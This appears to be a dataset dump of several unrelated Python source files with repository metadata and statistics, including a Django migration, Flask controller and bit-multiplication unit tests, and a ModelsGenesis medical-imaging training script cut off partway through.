from .class_tests.participant_test import * # noqa: F403 F401
from .class_tests.meeting_tests import * # noqa: F403 F401
from .class_tests.create_events import * # noqa: F403 F401
| 48.2 | 62 | 0.767635 | 36 | 241 | 4.916667 | 0.361111 | 0.20339 | 0.316384 | 0.40678 | 0.59887 | 0.59887 | 0.59887 | 0.418079 | 0 | 0 | 0 | 0.117073 | 0.149378 | 241 | 4 | 63 | 60.25 | 0.746341 | 0.261411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2254046be8e1bb718ade07247e9db1ee92d70013 | 206 | py | Python | src/test/__init__.py | HenrikPilz/BMEcatConverter | 28c6840fc70a3f04e3eae5fc7be32c7bc779c1da | [
"BSD-3-Clause"
] | 1 | 2021-03-14T08:20:51.000Z | 2021-03-14T08:20:51.000Z | src/test/__init__.py | HenrikPilz/BMEcatConverter | 28c6840fc70a3f04e3eae5fc7be32c7bc779c1da | [
"BSD-3-Clause"
] | 1 | 2021-11-29T09:56:18.000Z | 2021-12-01T22:01:13.000Z | src/test/__init__.py | HenrikPilz/BMEcatConverter | 28c6840fc70a3f04e3eae5fc7be32c7bc779c1da | [
"BSD-3-Clause"
] | 2 | 2021-08-30T08:14:34.000Z | 2021-09-28T15:10:23.000Z | from test.argumentParserTest import ArgumentParserTest
from test.datamodel import *
from test.handler import *
from test.integration import *
from test.mapping import *
from test.transformer import *
| 29.428571 | 55 | 0.800971 | 25 | 206 | 6.6 | 0.36 | 0.290909 | 0.339394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145631 | 206 | 6 | 56 | 34.333333 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
22733865afa8ebac046cef85960b6c8fcd98b22c | 2,144 | py | Python | georiviere/description/migrations/0007_auto_20210302_1654.py | georiviere/Georiviere-admin | 4ac532f84a7a8fef3e01384fad63e8e288d397c0 | [
"BSD-2-Clause"
] | 7 | 2021-11-05T14:52:25.000Z | 2022-03-24T21:18:02.000Z | georiviere/description/migrations/0007_auto_20210302_1654.py | georiviere/Georiviere-admin | 4ac532f84a7a8fef3e01384fad63e8e288d397c0 | [
"BSD-2-Clause"
] | 57 | 2021-11-02T10:27:34.000Z | 2022-03-31T14:08:32.000Z | georiviere/description/migrations/0007_auto_20210302_1654.py | georiviere/Georiviere-admin | 4ac532f84a7a8fef3e01384fad63e8e288d397c0 | [
"BSD-2-Clause"
] | 1 | 2021-12-05T14:55:42.000Z | 2021-12-05T14:55:42.000Z | # Generated by Django 3.1.7 on 2021-03-02 16:54
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('description', '0006_auto_20210302_1407'),
]
operations = [
migrations.AddField(
model_name='land',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='land',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AddField(
model_name='morphology',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='morphology',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AddField(
model_name='status',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='status',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AddField(
model_name='usage',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='usage',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
]
| 36.338983 | 124 | 0.613806 | 225 | 2,144 | 5.64 | 0.217778 | 0.113475 | 0.144996 | 0.170213 | 0.858944 | 0.858944 | 0.858944 | 0.798266 | 0.798266 | 0.798266 | 0 | 0.019923 | 0.274254 | 2,144 | 58 | 125 | 36.965517 | 0.79563 | 0.020989 | 0 | 0.846154 | 1 | 0 | 0.129709 | 0.010968 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.096154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
227cc822a64cfcfa8bd5b4d670053fd11d643b04 | 257 | py | Python | test/unit/library/test_utils.py | onefinestay/pylytics | b6e77e5d9931244efa6120409a4b97cc73efa4c9 | [
"Apache-2.0"
] | 5 | 2015-04-09T15:52:11.000Z | 2021-07-18T00:19:14.000Z | test/unit/library/test_utils.py | onefinestay/pylytics | b6e77e5d9931244efa6120409a4b97cc73efa4c9 | [
"Apache-2.0"
] | 11 | 2015-02-01T03:56:19.000Z | 2016-07-14T16:07:23.000Z | test/unit/library/test_utils.py | onefinestay/pylytics | b6e77e5d9931244efa6120409a4b97cc73efa4c9 | [
"Apache-2.0"
] | 4 | 2015-02-01T03:53:42.000Z | 2015-08-11T13:14:32.000Z | from pylytics.library.utils import _camel_to_snake, _camel_to_title_case
def test_camel_to_snake():
assert _camel_to_snake('HelloWorld') == 'hello_world'
def test_camel_to_title_case():
assert _camel_to_title_case('HelloWorld') == 'Hello World'
| 25.7 | 72 | 0.785992 | 38 | 257 | 4.736842 | 0.421053 | 0.233333 | 0.2 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116732 | 257 | 9 | 73 | 28.555556 | 0.792952 | 0 | 0 | 0 | 0 | 0 | 0.163424 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.4 | true | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
97f5ab1904673fcf57cabca0fa7d6ad84872e150 | 157 | py | Python | api/database/__init__.py | bymangjo/Metin2_Python_API | c8c42581e0d9eafad5c23053ab286810f7d4eb7a | [
"MIT"
] | null | null | null | api/database/__init__.py | bymangjo/Metin2_Python_API | c8c42581e0d9eafad5c23053ab286810f7d4eb7a | [
"MIT"
] | null | null | null | api/database/__init__.py | bymangjo/Metin2_Python_API | c8c42581e0d9eafad5c23053ab286810f7d4eb7a | [
"MIT"
] | 2 | 2018-10-29T03:29:22.000Z | 2019-11-23T14:12:46.000Z | # __init__.py
from database import communicationmanager
from database import commonmanager
from database import playermanager
from database import logmanager | 31.4 | 41 | 0.878981 | 18 | 157 | 7.444444 | 0.5 | 0.358209 | 0.537313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10828 | 157 | 5 | 42 | 31.4 | 0.957143 | 0.070064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3f593bc31a29e09f65219a4c4e0e4af52c1b7fd5 | 202 | py | Python | packages/auto-nlp-deployment/src/trainings/runtimes/kubernetes/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 4 | 2021-10-05T17:34:02.000Z | 2022-03-23T07:33:19.000Z | packages/auto-nlp-deployment/src/trainings/runtimes/kubernetes/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 11 | 2022-03-01T14:37:52.000Z | 2022-03-31T05:11:23.000Z | packages/auto-nlp-deployment/src/trainings/runtimes/kubernetes/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 1 | 2022-01-29T13:32:22.000Z | 2022-01-29T13:32:22.000Z | # from .kubernetes_run import KubernetesRun
from .kubernetes_training_runtime import KubernetesTrainingRuntimeEnvironment
from .kubernetes_training_runtime_config import KubernetesTrainingRuntimeConfig
| 50.5 | 79 | 0.915842 | 18 | 202 | 9.944444 | 0.555556 | 0.234637 | 0.24581 | 0.324022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064356 | 202 | 3 | 80 | 67.333333 | 0.94709 | 0.20297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
58ef4b784e5048d71d2bad810af56b35d95c5ae1 | 1,892 | py | Python | python_framework/api/test/apitests/testone/api/src/controller/MyController.py | SamuelJansen/python_framework | a3e57def47c13edd67319f9bbca32be2bbb00f43 | [
"MIT"
] | 5 | 2020-09-02T20:05:44.000Z | 2022-03-04T21:02:13.000Z | python_framework/api/test/apitests/testone/api/src/controller/MyController.py | SamuelJansen/python_framework | a3e57def47c13edd67319f9bbca32be2bbb00f43 | [
"MIT"
] | 1 | 2021-05-23T22:55:58.000Z | 2021-05-24T15:33:50.000Z | python_framework/api/test/apitests/testone/api/src/controller/MyController.py | SamuelJansen/python_framework | a3e57def47c13edd67319f9bbca32be2bbb00f43 | [
"MIT"
] | 3 | 2020-11-01T01:13:09.000Z | 2022-02-22T15:01:19.000Z | from python_framework.api.src.enumeration.HttpStatus import HttpStatus
from python_framework.api.src.service.flask.FlaskManager import Controller, ControllerMethod
@Controller(url='/test-controller', tag='MyUrl', description='My url controller')
class MyController:
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [[dict]],
responseClass = [dict],
logRequest = True,
logResponse = True,
muteStacktraceOnBusinessRuleException = False
)
def post(self, requestBodyList):
return requestBodyList, HttpStatus.OK
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [[dict]],
responseClass = [dict],
logRequest = True,
logResponse = True
)
def patch(self, requestBodyList):
return requestBodyList, HttpStatus.OK
@ControllerMethod(
url = '/all-fine-if-its-none',
logRequest = True,
logResponse = True
)
def get(self):
return None, HttpStatus.OK
@Controller(url='/test-controller/batch', tag='MyUrl', description='My url controller')
class MyBatchController:
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [dict],
responseClass = [[dict]],
logRequest = True,
logResponse = True
)
def post(self, requestBodyList):
return requestBodyList , HttpStatus.OK
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [dict],
responseClass = [[dict]],
logRequest = True,
logResponse = True
)
def patch(self, requestBodyList):
return requestBodyList, HttpStatus.OK
@ControllerMethod(
url = '/all-fine-if-its-none',
logRequest = True,
logResponse = True
)
def get(self):
return [None], HttpStatus.OK
| 28.666667 | 92 | 0.629493 | 167 | 1,892 | 7.11976 | 0.275449 | 0.095879 | 0.126156 | 0.146341 | 0.812447 | 0.770395 | 0.770395 | 0.704794 | 0.704794 | 0.704794 | 0 | 0 | 0.262156 | 1,892 | 65 | 93 | 29.107692 | 0.851719 | 0 | 0 | 0.719298 | 0 | 0 | 0.116279 | 0.084567 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.035088 | 0.105263 | 0.280702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
58f3dbcf759b1e38dd489b313666fbd1e4eca66f | 56 | py | Python | src/visualization/__init__.py | haoranD/CRISP-DM-PYTHON | 7d3675454352aad6b5e1fee9e19f5bd72fa357e4 | [
"MIT"
] | null | null | null | src/visualization/__init__.py | haoranD/CRISP-DM-PYTHON | 7d3675454352aad6b5e1fee9e19f5bd72fa357e4 | [
"MIT"
] | null | null | null | src/visualization/__init__.py | haoranD/CRISP-DM-PYTHON | 7d3675454352aad6b5e1fee9e19f5bd72fa357e4 | [
"MIT"
] | 2 | 2021-11-25T13:33:03.000Z | 2021-12-03T13:47:47.000Z | print('Successfully import all the necessary packages')
| 28 | 55 | 0.821429 | 7 | 56 | 6.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 56 | 1 | 56 | 56 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
453eb1fab235f3e3c711677a39e8979d552bc579 | 5,409 | py | Python | tests/test_multiplication.py | kanicreampasta/pybit-lib | 9f39e0e8cdb519cb830e3af95ad7a4e168909e2f | [
"MIT"
] | 3 | 2021-01-19T08:02:17.000Z | 2021-01-24T13:57:05.000Z | tests/test_multiplication.py | kanicreampasta/pybit-lib | 9f39e0e8cdb519cb830e3af95ad7a4e168909e2f | [
"MIT"
] | 24 | 2020-12-30T14:39:12.000Z | 2021-05-26T08:21:20.000Z | tests/test_multiplication.py | kanicreampasta/pybit-lib | 9f39e0e8cdb519cb830e3af95ad7a4e168909e2f | [
"MIT"
] | null | null | null | import pytest
from pybit.bits import Bits
from pybit.multiplication import Multiplication
def test_booth_primary():
pass
def test_booth_secondary():
A1 = Bits.from_dec(0b010111, 6)
B1 = Bits.from_dec(0b001011, 6)
assert Multiplication.booth_secondary(A1, B1) == [
Bits([1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1]),
Bits([1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0]),
Bits([0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1])
]
A2 = Bits.from_dec(0b101111, 6)
B2 = Bits.from_dec(0b011010, 6)
assert Multiplication.booth_secondary(A2, B2) == [
Bits([0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0]),
Bits([0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0]),
Bits([1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0]),
Bits([1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0])
]
def test_booth_tertiary():
A1 = Bits.from_dec(0b101111, 6)
B1 = Bits.from_dec(0b011010, 6)
assert Multiplication.booth_tertiary(A1, B1) == [
Bits([1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0]),
Bits([1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0]),
Bits([1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0])
]
A2 = Bits.from_dec(0b101111, 6)
B2 = Bits.from_dec(0b110010, 6)
assert Multiplication.booth_tertiary(A2, B2) == [
Bits([1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0]),
Bits([0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0])
]
def test_CLA():
A1 = Bits([1, 0, 1, 1, 1, 1, 0, 1])
B1 = Bits([1, 0, 1, 0, 1, 1, 1, 1])
assert Multiplication.CLA(A1, B1, 0, size=8) == [
Bits([0, 0, 0, 1, 0, 0, 1, 0]),
Bits([1, 0, 1, 0, 1, 1, 0, 1]),
Bits([1, 0, 1, 1, 1, 1, 1, 1]),
Bits([0, 1, 1, 0, 1, 1, 0, 0])
]
A2 = Bits([0, 1, 0, 1, 1, 0, 1, 0])
B2 = Bits([1, 0, 1, 1, 1, 0, 0, 0])
assert Multiplication.CLA(A2, B2, 0, size=8) == [
Bits([1, 1, 1, 0, 0, 0, 1, 0]),
Bits([0, 0, 0, 1, 1, 0, 0, 0]),
Bits([1, 1, 1, 1, 1, 0, 0, 0]),
Bits([0, 0, 0, 1, 0, 0, 1, 0])
]
A3 = Bits([0, 1, 1, 1, 1, 0, 1, 0])
B3 = Bits([1, 0, 1, 1, 1, 0, 1, 1])
assert Multiplication.CLA(A3, B3, 0, size=8) == [
Bits([1, 1, 0, 0, 0, 0, 0, 1]),
Bits([0, 0, 1, 1, 1, 0, 1, 0]),
Bits([1, 1, 1, 1, 1, 0, 1, 0]),
Bits([0, 0, 1, 1, 0, 1, 0, 1])
]
def test_CSA():
X1 = Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
Y1 = Bits([0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0])
Z1 = Bits([1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0])
assert Multiplication.CSA(X1, Y1, Z1, size=12) == [
Bits([1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0]),
Bits([0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0])
]
X2 = Bits([0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0])
Y2 = Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
Z2 = Bits([1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0])
assert Multiplication.CSA(X2, Y2, Z2, size=12) == [
Bits([1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 0]),
Bits([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
]
X3 = Bits([1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0])
Y3 = Bits([0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0])
Z3 = Bits([1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 0])
assert Multiplication.CSA(X3, Y3, Z3, size=12) == [
Bits([0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0]),
Bits([1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0])
]
X4 = Bits([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
Y4 = Bits([0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0])
Z4 = Bits([1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0])
assert Multiplication.CSA(X4, Y4, Z4, size=12) == [
Bits([1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0]),
Bits([0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0])
]
def test_RCA():
A1 = Bits([1, 1, 0, 1, 0, 0, 1, 0])
B1 = Bits([1, 1, 1, 0, 0, 1, 0, 1])
assert Multiplication.RCA(A1, B1, 1, size=8) == [
Bits([1, 0, 1, 1, 1, 0, 0, 0]),
Bits([1, 1, 0, 0, 0, 1, 1, 1])
]
A2 = Bits([1, 0, 1, 1, 1, 0, 0, 0])
B2 = Bits([1, 1, 1, 0, 1, 1, 0, 0])
assert Multiplication.RCA(A2, B2, 0, size=8) == [
Bits([1, 0, 1, 0, 0, 1, 0, 0]),
Bits([1, 1, 1, 1, 1, 0, 0, 0])
]
def test_partial_product():
A1 = Bits([0, 1, 1, 0, 1, 1])
B1 = Bits([0, 1, 1, 1, 0, 1])
assert Multiplication.partial_product(A1, B1, size=6) == [
Bits([0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0]),
Bits([0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0]),
Bits([0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
]
A2 = Bits([1, 0, 1, 1, 1, 1])
B2 = Bits([0, 1, 1, 0, 1, 0])
assert Multiplication.partial_product(A2, B2, size=6) == [
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
Bits([1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
Bits([1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0]),
Bits([1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
]
def test_wallace_tree():
A1 = Bits([0, 1, 1, 0, 1, 1])
B1 = Bits([0, 1, 1, 1, 0, 1])
assert Multiplication.wallace_tree(A1, B1, size=6) == Bits([0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
A2 = Bits([1, 0, 1, 1, 1, 1])
B2 = Bits([0, 1, 1, 0, 1, 0])
assert Multiplication.wallace_tree(A2, B2, size=6) == Bits([1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0])
| 35.585526 | 100 | 0.417268 | 1,162 | 5,409 | 1.917384 | 0.04389 | 0.245063 | 0.241023 | 0.208259 | 0.83079 | 0.714093 | 0.66158 | 0.563285 | 0.495512 | 0.448384 | 0 | 0.273453 | 0.327972 | 5,409 | 151 | 101 | 35.821192 | 0.339477 | 0 | 0 | 0.151515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128788 | 1 | 0.060606 | false | 0.007576 | 0.022727 | 0 | 0.083333 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
18970bb622121bfed9181068f024262643a6ecf3 | 74,123 | py | Python | pytorch/main.py | mistermoutan/ModelsGenesis | 98af7075b93311fe655e9692773eb1ce015b8bd0 | [
"MIT"
] | null | null | null | pytorch/main.py | mistermoutan/ModelsGenesis | 98af7075b93311fe655e9692773eb1ce015b8bd0 | [
"MIT"
] | null | null | null | pytorch/main.py | mistermoutan/ModelsGenesis | 98af7075b93311fe655e9692773eb1ce015b8bd0 | [
"MIT"
] | null | null | null | from warnings import simplefilter
import torch
simplefilter(action="ignore", category=FutureWarning)
import os
from finetune_config import FineTuneConfig
from config import models_genesis_config
from dataset import Dataset
from finetune import Trainer
from evaluate import Tester
from cross_validator import CrossValidator
from feature_extractor import FeatureExtractor
from utils import *
def replication_of_results_pretrain(**kwargs):
config = models_genesis_config(False)
kwargs_dict_ = kwargs["kwargs_dict"]
replace_config_param_attributes(config, kwargs_dict_)
config.display()
save_object(config, "config", config.object_dir)
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.valid_fold]
x_test_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.test_fold] # Dont know in what sense they use this for
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset = Dataset(
config.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is non relevant as is overwritten by files
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True)
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def resume_replication_of_results_pretrain(run_nr: int, **kwargs):
config = models_genesis_config(False)
kwargs_dict_ = kwargs.get("kwargs_dict", False)
if kwargs_dict_ is not False:
replace_config_param_attributes(config, kwargs_dict_)
config.override_dirs(run_nr) # its key we get object_dir corresponding to the run to fetch the correct config object saved
# ensure we are not resuming with a different config
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
# not raising error because some experimetns were done before with saving the object
print("NO PREVIOUS CONFIG FOUND at {}".format(config.object_dir))
config.resume_ss = True
# config.scheduler_ss = "ReduceLROnPlateau"
config.display()
# for replication the datasets stay the same
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.valid_fold]
x_test_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.test_fold] # Dont know in what sense they use this for
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset = Dataset(
config.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is non relevant as is overwritten by files
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(
from_latest_checkpoint=True
) # still requires override dirs to find the specific checkpoint to resume from
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def replicate_acs_results_fcnresnet18_their_cubes(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = ["lidc_acs_provided"]
split = (0.8, 0.2, 0)
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=False)
dataset.use_acs_paper_transforms = True # !!
config = FineTuneConfig(
data_dir="",
task="REPLICATE_ACS_PAPER_THEIR_EXACT_DATA",
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
)
config.batch_size_sup = 8
config.nb_epoch_sup = 100
config.lr_sup = 0.001
config.milestones = [0.5 * config.nb_epoch_sup, 0.75 * config.nb_epoch_sup]
config.gamma = 0.1
config.scheduler_sup = "MultiStepLR"
# let it run since > than nb_epochs
config.patience_sup_terminate = 120
config.from_scratch = True
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True)
trainer_mg_replication.finetune_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def replicate_acs_results_fcnresnet18_my_cubes(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = ["lidc_80_80_padded"]
split = (0.8, 0.2, 0)
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=False)
dataset.use_acs_paper_transforms = True # !!
config = FineTuneConfig(
data_dir="",
task="REPLICATE_ACS_PAPER",
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
)
config.batch_size_sup = 8
config.nb_epoch_sup = 100
config.lr_sup = 0.001
config.milestones = [0.5 * config.nb_epoch_sup, 0.75 * config.nb_epoch_sup]
config.gamma = 0.1
config.scheduler_sup = "MultiStepLR"
# let it run since > than nb_epochs
config.patience_sup_terminate = 120
config.from_scratch = True
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True)
trainer_mg_replication.finetune_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def resume_replicate_acs_results_fcnresnet18_my_cubes(run_nr, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = ["lidc_80_80_padded"]
config = FineTuneConfig(
data_dir="",
task="REPLICATE_ACS_PAPER",
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
